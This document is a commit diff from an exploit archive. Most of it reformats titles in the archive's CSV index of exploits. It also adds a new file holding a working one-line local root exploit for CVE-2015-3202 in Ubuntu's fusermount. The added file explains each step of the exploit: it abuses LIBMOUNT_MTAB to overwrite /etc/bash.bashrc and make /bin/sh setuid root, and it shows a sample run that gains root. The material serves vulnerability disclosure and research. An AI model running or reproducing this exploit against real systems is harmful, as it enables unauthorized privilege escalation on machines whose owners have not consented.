DB: 2015-05-24

1 new exploits

files.csv

@@ -17687,7 +17687,7 @@ id,file,description,date,author,platform,type,port
 20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
-20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
+20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
@@ -21865,7 +21865,7 @@ id,file,description,date,author,platform,type,port
 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0
 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0
 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0
-24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
+24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0
 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
 24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0
@@ -23681,8 +23681,8 @@ id,file,description,date,author,platform,type,port
 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0
 26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0
 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0
-26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
+26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
-26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
+26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0
 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0
 26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0
@@ -27061,7 +27061,7 @@ id,file,description,date,author,platform,type,port
 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
-29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
+29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
@@ -33152,7 +33152,7 @@ id,file,description,date,author,platform,type,port
 36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
 36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
-36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
@@ -33471,3 +33471,4 @@ id,file,description,date,author,platform,type,port
 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
+37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0

platforms/linux/local/37089.txt

@@ -0,0 +1,98 @@
+Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba
+Tweet: https://twitter.com/taviso/status/601370527437967360
+
+
+
+# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
+ 
+12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+ 
+# Here's how it works, $a holds the name of a shellscript to be executed as
+# root.
+a=/tmp/.$$;
+ 
+# $b is used twice, first to build the contents of shellscript $a, and then as
+# a command to make $a executable. Quotes are unused to save a character, so
+# the seperator must be escaped.
+b=chmod\ u+sx;
+ 
+# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
+# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
+# and dont make it drop privileges.
+#
+# http://www.openwall.com/lists/oss-security/2013/08/22/12
+#
+echo $b /bin/sh>$a;
+ 
+# Now make the $a script executable using the command in $b. This needlessly
+# sets the setuid bit, but that doesn't do any harm.
+$b $a;
+ 
+# Now make $a the directory we want fusermount to use. This directory name is
+# written to an arbitrary file as part of the vulnerability, so needs to be
+# formed such that it's a valid shell command.
+a+=\;$a;
+ 
+# Create the mount point for fusermount.
+mkdir -p $a;
+ 
+# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
+# /bin/mount so that it can use privileged mount options that are normally
+# restricted if ruid != euid. That's acceptable (but scary) in theory, because
+# fusermount can sanitize the call to make sure it's safe.
+#
+# However, because mount thinks it's being invoked by root, it allows
+# access to debugging features via the environment that would not normally be
+# safe for unprivileged users and fusermount doesn't sanitize them.
+#
+# Therefore, the bug is that the environment is not cleared when calling mount
+# with ruid=0. One debugging feature available is changing the location of
+# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
+# files.
+#
+# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
+# current shell from $0...so it only works if you're using bash!).
+#
+# The line written by fusermount will look like this:
+#
+# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
+#
+# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
+# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
+# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
+# next time root logs in.
+#
+# Another way to exploit it would be overwriting /etc/default/locale, then
+# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
+# wouldn't have to log in, but you would have to wait around until midnight to
+# check if it worked.
+#
+# And we have enough characters left for a hash tag/comment.
+LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+ 
+# Here is how the exploit looks when you run it:
+#
+# $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+# fusermount: failed to open /etc/fuse.conf: Permission denied
+# sending file descriptor: Socket operation on non-socket
+# $ cat /etc/bash.bashrc 
+# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0
+#
+# Now when root logs in next...
+# $ sudo -s
+# bash: /dev/fuse: Permission denied
+# # ls -Ll /bin/sh
+# -rwsr-xr-x 1 root root 121272 Feb 19  2014 /bin/sh
+# # exit
+# $ sh -c 'id'
+# euid=0(root) groups=0(root)
+#
+# To repair the damage after testing, do this:
+#
+# $ sudo rm /etc/bash.bashrc
+# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash
+# $ sudo chmod 0755 /bin/sh
+# $ sudo umount /tmp/.$$\;/tmp/.$$
+# $ rm -rf /tmp/.$$ /tmp/.$$\;
+#